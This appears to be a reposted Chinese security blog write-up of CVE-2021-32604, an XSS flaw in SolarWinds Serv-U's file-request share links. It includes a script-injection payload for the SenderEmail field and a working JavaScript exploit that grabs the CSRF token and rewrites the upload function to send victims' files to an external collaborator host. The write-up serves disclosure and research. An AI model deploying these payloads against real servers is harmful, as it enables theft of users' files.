Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

admin 2021年11月17日03:54:04安全漏洞评论102 views12123字阅读7分4秒阅读模式
Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)点击上方蓝字关注我们


概述


研究人员在 SolarWinds Serv-U FTP 服务器中发现了一个有趣的漏洞。尽管初始向量需要身份验证,但低权限用户能够创建可公开访问的URL,当受害者访问该URL时将触发XSS有效载荷。


Serv-U包含两个功能来发送和接收来自其他用户的文件,在测试“请求文件”功能时,研究人员注意到发件人电子邮件输入被放置在可公开访问的共享URL中时没有被编码。这意味着攻击者可以向受害者发送一个共享URL来触发XSS漏洞。


漏洞复现


以下步骤是在Serv-U 15.2.3版本上测试的,通过身份验证后,用户可以转到“请求文件”选项卡以生成文件请求URL,如下图所示:


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


使用虚拟数据并发送请求,会显示可公开访问的共URL:


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


检查生成的URL会显示文件上传表单。在此处上传的文件将被发送回链接创建者的Serv-U文件夹。


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


现在,如果我们修改原始链接生成请求,并在“SenderEmail”字段中包含一个XSS 有效载荷,例如"'/><script>alert(7)%3b</script>%40localhost.local


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


然后从响应中获取“ShareURL”。


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


这样一来,就成功在可公开访问的共享URL上获得XSS了。


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


漏洞利用

由于漏洞利用使用了Ajax异步调用,因此我们需要稍作调整才能将文件正确上传到 Serv-U同时发送出去。脚本可以简单地托管,然后使用<script>标签通过XSS注入。简而言之,具体步骤如下:


  • 从页面抓取当前CSRF令牌

  • 重写“SubmitForm”函数,改为发布到外部主机

  • 调用Ajax方法将文件POST到原始Serv-U主机,以确保满足原始承诺


var csrftoken = $('script').text().match(/(&CsrfToken='+")(.*?)";/)[2];function SubmitForm(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual) {  var bSubmitted = false;  SubmitOriginal(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual);  if (rForm != null && rForm != undefined && rFormsTargetFrame != null && rFormsTargetFrame != undefined && sFileName != undefined && sFileName != null && sFileName != '' && nTransferID > 0) {    if (bIsVirtual == undefined || bIsVirtual == null)      bIsVirtual = 0;    var sAction = 'http://SOMEURL.burpcollaborator.net/Web Client/Share/MultipleFileUploadResult.htm?Command=UploadFileShare&TransferID=' + nTransferID + '&File=' + encodeURIComponent(sFileName) + '&ShareToken=' + g_sShareToken + '&IsVirtual=' + bIsVirtual + '&CsrfToken=' + csrftoken;    rForm.setAttribute('action', sAction);    rFormsTargetFrame.onload = null;    rFormsTargetFrame.src = '/Web Client/Share/MultipleFileUploadResetFrame.htm';    rForm.submit();    bSubmitted = true;  } else    ASSERT('Cannot submit form because function parameters are invalid.');  return bSubmitted;}
function SubmitOriginal(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual) { jQuery.ajax({ url: '/Web Client/Share/MultipleFileUploadResult.htm?Command=UploadFileShare&TransferID=' + nTransferID + '&File=' + encodeURIComponent(sFileName) + '&ShareToken=' + g_sShareToken + '&IsVirtual=' + bIsVirtual + '&CsrfToken=' + csrftoken, data: new FormData(rForm), cache: false, contentType: false, processData: false, method: 'POST' });}


Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

END



Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)


好文!必须在看

本文始发于微信公众号(SecTr安全团队):Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月17日03:54:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604) http://cn-sec.com/archives/414565.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: